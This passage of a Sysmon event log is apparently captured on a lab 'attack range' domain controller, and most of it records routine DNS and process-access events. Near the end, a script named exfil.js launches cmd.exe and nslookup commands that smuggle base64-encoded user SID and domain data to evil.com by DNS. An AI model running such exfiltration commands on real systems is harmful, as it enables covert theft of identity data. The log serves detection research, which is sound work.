354300x8000000000000000202686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52928- 354300x8000000000000000202685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52927- 354300x8000000000000000202684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52926- 354300x8000000000000000202683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{00000000-0000-0000-0000-000000000000}7264<unknown process>-udptruefalse127.0.0.1-52926-false127.0.0.1-53domain 354300x8000000000000000202682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{00000000-0000-0000-0000-000000000000}7264<unknown process>-udpfalsefalse127.0.0.1-52925-false127.0.0.1-53domain 354300x8000000000000000202681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.784{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52925- 354300x8000000000000000202680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.784{00000000-0000-0000-0000-000000000000}7264<unknown process>-udptruefalse127.0.0.1-52925-false127.0.0.1-53domain 354300x8000000000000000202679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52924- 354300x8000000000000000202678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.637{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52923- 354300x8000000000000000202677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.637{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-52923-false127.0.0.1-53domain 354300x8000000000000000202676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.637{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-52922-false127.0.0.1-53domain 354300x8000000000000000202675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.637{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52922- 354300x8000000000000000202674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.637{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-52922-false127.0.0.1-53domain 354300x8000000000000000202673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.636{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-52921-false127.0.0.1-53domain 354300x8000000000000000202672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.636{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52921- 354300x8000000000000000202671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.636{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-52921-false127.0.0.1-53domain 354300x8000000000000000202670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.579{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52920- 354300x8000000000000000202669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.579{00000000-0000-0000-0000-000000000000}8160<unknown process>-udptruefalse127.0.0.1-52920-false127.0.0.1-53domain 354300x8000000000000000202668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.579{00000000-0000-0000-0000-000000000000}8160<unknown process>-udpfalsefalse127.0.0.1-52919-false127.0.0.1-53domain 354300x8000000000000000202667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.578{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52919- 354300x8000000000000000202666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.578{00000000-0000-0000-0000-000000000000}8160<unknown process>-udptruefalse127.0.0.1-52919-false127.0.0.1-53domain 354300x8000000000000000202665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.578{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52918- 354300x8000000000000000202664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.578{00000000-0000-0000-0000-000000000000}8160<unknown process>-udptruefalse127.0.0.1-52918-false127.0.0.1-53domain 354300x8000000000000000202663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-52911-false127.0.0.1-53domain 354300x8000000000000000202662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-52911-false127.0.0.1-53domain 354300x8000000000000000202661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-52910-false127.0.0.1-53domain 354300x8000000000000000202660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.395{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-52910-false127.0.0.1-53domain 354300x8000000000000000202659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.394{00000000-0000-0000-0000-000000000000}4712<unknown process>-udpfalsefalse127.0.0.1-52909-false127.0.0.1-53domain 354300x8000000000000000202658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.393{00000000-0000-0000-0000-000000000000}4712<unknown process>-udptruefalse127.0.0.1-52909-false127.0.0.1-53domain 10341000x8000000000000000202657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.604{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5F41-000000005F02}2108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.311{00000000-0000-0000-0000-000000000000}8108<unknown process>-udpfalsefalse127.0.0.1-52908-false127.0.0.1-53domain 10341000x8000000000000000202655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.604{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5F41-000000005F02}2108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.311{00000000-0000-0000-0000-000000000000}8108<unknown process>-udptruefalse127.0.0.1-52908-false127.0.0.1-53domain 354300x8000000000000000202653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.311{00000000-0000-0000-0000-000000000000}8108<unknown process>-udpfalsefalse127.0.0.1-52907-false127.0.0.1-53domain 354300x8000000000000000202652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.310{00000000-0000-0000-0000-000000000000}8108<unknown process>-udptruefalse127.0.0.1-52907-false127.0.0.1-53domain 354300x8000000000000000202651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.310{00000000-0000-0000-0000-000000000000}8108<unknown process>-udpfalsefalse127.0.0.1-52906-false127.0.0.1-53domain 354300x8000000000000000202650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.310{00000000-0000-0000-0000-000000000000}8108<unknown process>-udptruefalse127.0.0.1-52906-false127.0.0.1-53domain 354300x8000000000000000202649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.198{00000000-0000-0000-0000-000000000000}5708<unknown process>-udpfalsefalse127.0.0.1-52905-false127.0.0.1-53domain 354300x8000000000000000202648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.197{00000000-0000-0000-0000-000000000000}5708<unknown process>-udptruefalse127.0.0.1-52905-false127.0.0.1-53domain 354300x8000000000000000202647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.197{00000000-0000-0000-0000-000000000000}5708<unknown process>-udpfalsefalse127.0.0.1-52904-false127.0.0.1-53domain 354300x8000000000000000202646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.197{00000000-0000-0000-0000-000000000000}5708<unknown process>-udptruefalse127.0.0.1-52904-false127.0.0.1-53domain 10341000x8000000000000000202645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.604{2E1864BB-17C7-629A-5F41-000000005F02}21085948C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5E41-000000005F02}2336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.197{00000000-0000-0000-0000-000000000000}5708<unknown process>-udpfalsefalse127.0.0.1-52903-false127.0.0.1-53domain 354300x8000000000000000202643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.196{00000000-0000-0000-0000-000000000000}5708<unknown process>-udptruefalse127.0.0.1-52903-false127.0.0.1-53domain 10341000x8000000000000000202642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.589{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5F41-000000005F02}2108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.573{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.573{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.573{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.573{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.573{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5E41-000000005F02}2336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.573{2E1864BB-17A1-629A-783D-000000005F02}55525200C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-5E41-000000005F02}2336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.581{2E1864BB-17C7-629A-5E41-000000005F02}2336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldjmc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.558{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlizpow.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-17C7-629A-5C41-000000005F02}8964848C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5D41-000000005F02}7560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5D41-000000005F02}7560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.504{2E1864BB-17C7-629A-5B41-000000005F02}60004816C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-5D41-000000005F02}7560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.506{2E1864BB-17C7-629A-5D41-000000005F02}7560C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-5B41-000000005F02}6000C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > 